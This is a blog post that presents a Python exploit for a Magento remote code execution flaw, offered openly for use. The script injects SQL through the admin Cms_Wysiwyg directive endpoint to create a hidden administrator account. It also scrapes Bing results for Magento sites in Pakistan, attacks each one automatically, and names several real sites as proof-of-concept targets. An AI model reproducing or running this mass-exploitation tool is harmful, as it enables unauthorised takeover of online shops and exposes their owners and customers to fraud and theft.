Analyzing Magento Vulnerability

Hi Friends,

Many of you already know that people try to do the things which provide them some fruits. likewise Carders trying to Exploit Shopping carts for getting into the transaction system in order to snatch people's money. Magento is a famous eCommerce CMS. this is the main target also as many of shopping sites are based on this CMS.

Here is a Recent exploit "obviously not found by me but code is mine." Which allows an attacker to change Username and Password of a site remotely. this is due to remote code Execution.

Exploit Code

DATA HOSTED WITH ♥ BY PASTEBIN.COM - DOWNLOAD RAW - SEE ORIGINAL

1. #!/usr/bin/python
2. '''
3. POC Sites:
4. www.anandindia.in
5. goyalglassware.com
6. ishopping.pk
7. value.pk
8.  
9.  
10. References:
11. http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/
12. '''
13. try:
14.         from urlparse import urlsplit
15.         import requests, base64, sys, re, os
16. except:
17.         exit("\n\n[-] Import Error !\n")
18.  
19. def Exploit(url):
20.         final_url = "http://" + url + "/admin/Cms_Wysiwyg/directive/index/"
21.         q = """
22.                 SET @SALT = 'rp';
23.                 SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
24.                 SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
25.                 INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
26.                 INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
27.         """
28.         query = q.replace("\n", "").format(username="stoker", password="secret")
29.         pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
30.         r = requests.post(final_url,
31.                   data={"___directive":"e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
32.                         "filter": base64.b64encode(pfilter),
33.                         "forwarded": 1})
34.         if r.ok:
35.                 print "\n -- > [{0}/admin]  Credentials: ['stoker' : 'secret']".format(url)
36.         else:
37.                 print " [-] {0} Not Vulnerable".format(url)
38.  
39. def main():
40.         # Change Dork in Bing URL if u need to modify it !
41.         # Google Will also Work Same, infact more better if you use
42.         # inurl:js/magentothem/
43.         # dork, but it'll ask you to enter captcha after multiple requests from the same ip
44.         # i'm too lazy to play with that, so i gone ahead with bing.
45.         # Bing's instreamUrl:Title:URL is not gonna work Here !
46.         response = requests.get('http://www.bing.com/search?q=Powered+by+Magento+site%3Apk')
47.         URLs = re.findall(r'href=[\'"]?([^\'" >]+)', response.content) # Old Friend :P
48.         URLS_LIST = [] # Container for Bitches !
49.         for url in URLs:
50.                 baseUrl = urlsplit(url).netloc # meet your requirements ;)
51.                 if len(baseUrl) != 0: # Cheaters Not Allowed !
52.                         URLS_LIST.append(baseUrl) # Load Bitches
53.         for uri in set(URLS_LIST):
54.                 Exploit(uri) # Bang Bang Bang
55.  
56. if __name__ == '__main__':
57.         os.system('cls')
58.         try:
59.                 print '''\n
60. -------------------------------------------------
61.         Title:  Magento Auth Exploit !
62.  
63.         Author: Muhammad Adeel
64.         Mail:   Chaudhary1337@gmail.com
65.         Blog:   http://urdusecurity.blogspot.com
66. -------------------------------------------------\n\n
67.                 '''
68.                 main()
69.         except:
70.                 exit("\nErrrrrrrrrrrrrrrrroooooooooooooooooooooorrrrrrrrrrrrrrrrrrrrrrrrrrr !!!")

and here are Results i got from Execution of the Script.

Bingoo !!

P.S: No any sites were harmed and Affected ones are reported already.